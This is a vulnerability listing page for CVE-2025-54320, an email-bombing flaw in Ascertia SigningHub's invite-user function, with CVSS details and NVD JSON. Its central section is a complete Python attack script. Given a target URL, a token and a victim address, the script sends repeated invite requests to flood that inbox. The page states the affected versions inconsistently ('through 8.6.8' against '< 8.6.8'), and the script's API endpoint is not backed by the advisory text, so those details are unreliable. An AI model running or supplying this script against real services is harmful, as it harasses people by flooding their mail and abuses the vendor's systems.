CVE-2025-54320

Description

In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ascertia:signinghub:*:*:*:*:*:*:*:* - VULNERABLE

Ascertia SigningHub < 8.6.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54320 PoC - Email Bombing via Invite User Function
# Target: Ascertia SigningHub < 8.6.8
# Vulnerability: Lack of rate limiting on invite user function

import requests
import time
import argparse

def exploit_cve_2025_54320(target_url, auth_token, target_email, count=100):
    """
    CVE-2025-54320 Exploit - Email bombing via invite user API
    
    Args:
        target_url: Base URL of SigningHub instance
        auth_token: Authentication token (low-privilege user)
        target_email: Target email address to flood
        count: Number of invite requests to send
    """
    
    session = requests.Session()
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/json'
    }
    
    # Invite user API endpoint
    invite_endpoint = f"{target_url}/api/v1/users/invite"
    
    payload = {
        'email': target_email,
        'role': 'user',
        'send_invite': True
    }
    
    print(f"[*] Starting email bombing attack on {target_email}")
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending {count} invite requests...")
    
    for i in range(count):
        try:
            response = session.post(invite_endpoint, json=payload, headers=headers)
            if response.status_code == 200:
                print(f"[+] Request {i+1}/{count} sent successfully")
            else:
                print(f"[-] Request {i+1}/{count} failed: {response.status_code}")
        except Exception as e:
            print(f"[-] Error: {e}")
        
        # Small delay to avoid immediate connection issues
        time.sleep(0.1)
    
    print(f"[*] Attack completed. Sent {count} invite requests.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-54320 PoC')
    parser.add_argument('--url', required=True, help='Target SigningHub URL')
    parser.add_argument('--token', required=True, help='Authentication token')
    parser.add_argument('--email', required=True, help='Target email address')
    parser.add_argument('--count', type=int, default=100, help='Number of requests')
    
    args = parser.parse_args()
    exploit_cve_2025_54320(args.url, args.token, args.email, args.count)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54320
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54320
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54320/
[4] VulDB https://vuldb.com/cve/CVE-2025-54320
[5] https://github.com/saykino/CVE-2025-54320
[6] https://www.ascertia.com/company/vulnerability-disclosure-policy/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54320", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:48.880", "lastModified": "2025-11-20T19:02:03.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ascertia:signinghub:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.6.8", "matchCriteriaId": "04320C9C-96AC-4A4A-8EEA-27C59A9EDBE7"}]}]}], "references": [{"url": "https://github.com/saykino/CVE-2025-54320", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.ascertia.com/company/vulnerability-disclosure-policy/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}